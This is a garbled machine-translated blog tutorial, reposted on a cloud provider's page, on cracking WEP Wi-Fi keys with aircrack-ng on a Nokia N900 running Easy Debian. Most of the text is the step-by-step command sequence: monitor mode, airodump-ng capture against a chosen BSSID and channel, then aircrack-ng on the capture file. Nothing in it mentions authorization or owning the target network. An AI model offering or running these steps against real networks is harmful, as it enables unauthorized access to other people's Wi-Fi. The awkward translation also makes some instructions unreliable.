N900 install Easy Debian to crack wireless keys

Source: Internet
Author: User
Tags bssid

 

Install Easy Debian

 

Open the program manager and find the Easy Debian program to start installation... After installing Easy Debian,

 

In the program group, programs such as close debian, debian chroot, debian lxde, And deb img install are displayed.

 

Install debian img .....

 

Run deb img install

 

Select the system installation mode, Main (server version), and Sweden (desktop version)

 

Select the installation path mydocs or SD card. The installation process is long (depending on the network conditions .. It may take about 30 minutes to install)

 

Enter the debian lxde window!

 

2. Install aircrack-ng and crack it

 

In the n900 program bar, find "synaptic pkg mg. Press search, aircrack-ng, mark, and apply to download and install the SDK.

 

Find debian chroot in the n900 program directory

 

Run the following command:

 

Ifconfig wlan0 down press ENTER

 

Iwconfig wlan0 mode monitor press ENTER

 

(Set the NIC to monitor. For more information, Run man iwconfig .. Note:

 

All are finished. To continue using wifi, You need to restore the NIC settings ..)

 

Ifconfig wlan0 up press ENTER

 

Airodump-ng wlan0 press ENTER

 

First, let's look at the data. The upgrade is faster. Check the signal. That is better. And we need a wep password. Record the mac address.

 

And the ch display is also recorded. Press ctrl + c to stop

 

Airodump-ng-c 11 (this is the ch number)-bssid XX: XX (this is the mac address)-w 123

 

(This 123 is random, the first part of the file name) wlan0 press Enter... Overall (airodump-ng #-c #11 #-bssid # XX: XX #-

 

W #123 # wlan0 press Enter) (for easy viewing, # indicates the Space key)

 

The above is the number of captured packets .... My personal suggestion should be over 50000...

 

However, I waited until 100000 to start eating XX For a success today. When I saw that the data volume reached 50000 or more, I press ctrl + c to stop.

 

Finally, the attack is cracked. The failure is here. Press "Stop" and then press aircrack-ng 123.

 

(This is the name of the file package you just picked up) *. cap press ENTER

 

The password will be successful.

 

3. Reset Nic settings

 

Now the password is cracked, but the network cannot be opened. What should I do ,? Because the NIC is in the monitor mode, you need to restore it:

 

Ifconfig wlan0 down press ENTER

Iwconfig wlan0 mode Managed press ENTER

Ifconfig wlan0 up press ENTER

 

In this way, you can access the Internet,

From the semi-pitfall farmer's blog

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.